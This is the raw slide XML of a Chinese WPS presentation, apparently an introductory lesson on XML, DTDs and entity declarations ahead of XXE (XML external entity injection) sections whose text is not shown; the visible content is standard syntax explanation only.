              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>相比，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>有哪些优势？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>标记是固定的，每个网站开发者都使用相同的标签来做相同的事情，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>:&lt;head&gt;&lt;title&gt;&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;/body&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800"/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2800"/>
              <a:t>相比之下，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>允许创建自己的标签来标记数据。如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>&lt;name&gt;zhangsan&lt;/name&gt;&lt;age&gt;20&lt;/age&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>的灵活性有很多好处，它允许在公司数据库和网站之间传输数据，而不会丢失关键的描述性信息。其次，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>会使搜索更加高效，因为搜索引擎可以通过标签定位而不是长文本进行搜索。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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XML</a:t>
            </a:r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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>语法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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/>
              <a:t>&lt;?xml version=”1.0” encoding=”UTF-8”?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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/>
              <a:t>&lt;person&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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/>
              <a:t>&lt;name&gt;A&lt;/name&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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/>
              <a:t>&lt;age&gt;20&lt;/age&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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/>
              <a:t>&lt;/person&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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XML</a:t>
            </a:r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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>文档</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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/>
              <a:t>作用：定义合法的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>文档构建模块</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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/>
              <a:t>使用方式：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>内部声明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>DTD:&lt;!DOCTYPE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>根元素</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>元素声明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>]&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>外部引用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>DTD:&lt;!DOCTYPE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>根元素</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t> SYSTEM “DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800"/>
              <a:t>文件路径</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>引用公共</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>DTD:&lt;!DOCTYPE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>根元素</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t> PUBLIC “DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>文件名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>” “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>共用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>DTD</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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/>
              <a:t>文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>URL”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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XML</a:t>
            </a:r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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>实体？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/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2800"/>
              <a:t>实体可以理解为变量，其必须在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>中定义声明，可以在文档中的其他位置引用该实体的值。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/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2800"/>
              <a:t>实体根据引用方式，还可以分为内部实体和外部实体。看看这些实体的声明方式。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/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2800"/>
              <a:t>内部实体</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>实体名称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>实体的值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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XML</a:t>
            </a:r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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>实体？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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/>
              <a:t>外部实体</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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/>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>实体名称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t> SYSTEM “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>文件路径</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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/>
              <a:t>参数实体</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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/>
              <a:t>&lt;!ENTITY % </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>实体名称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>实体值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;!ENTITY % </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实体名称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> SYSTEM “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件路径</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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TABLE_ENDDRAG_ORIGIN_RECT" val="579*6"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="144*213*579*6"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WPP_MARK_KEY" val="261e2dca-833b-4d2c-b3be-0e1d7fc3a61c"/>
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiOTJmMjU0YjkxYmJkNmRhZDFlY2ViMDcwNDc0MTFhOTIifQ=="/>
  <p:tag name="commondata" val="eyJoZGlkIjoiMDEwNDIxMzdhYzU4YjM2M2E2NTk5ODEyM2U4ODg5MjMifQ==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2852</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>224</Paragraphs>
  <Slides>19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宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>等线 Light</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>默认设计模板</vt:lpstr>
      <vt:lpstr>标题</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>XML介绍</vt:lpstr>
      <vt:lpstr>XML介绍</vt:lpstr>
      <vt:lpstr>XML介绍</vt:lpstr>
      <vt:lpstr>XML介绍</vt:lpstr>
      <vt:lpstr>XML介绍</vt:lpstr>
      <vt:lpstr>XML介绍</vt:lpstr>
      <vt:lpstr>XML介绍</vt:lpstr>
      <vt:lpstr>XML介绍</vt:lpstr>
      <vt:lpstr>伪协议</vt:lpstr>
      <vt:lpstr>伪协议</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>XXE - XML外部实体注入</vt:lpstr>
      <vt:lpstr>XXE - XML外部实体注入</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>XXE - XML外部实体注入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PPT课程标题</dc:title>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>一枚木木夕</cp:lastModifiedBy>
  <cp:revision>289</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-06-06T01:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-01T04:10:35Z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2052-12.1.0.17827</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>E7CA9CB11F16413E9620898F42CD7FFB</vt:lpwstr>
  </property>
</Properties>
</file>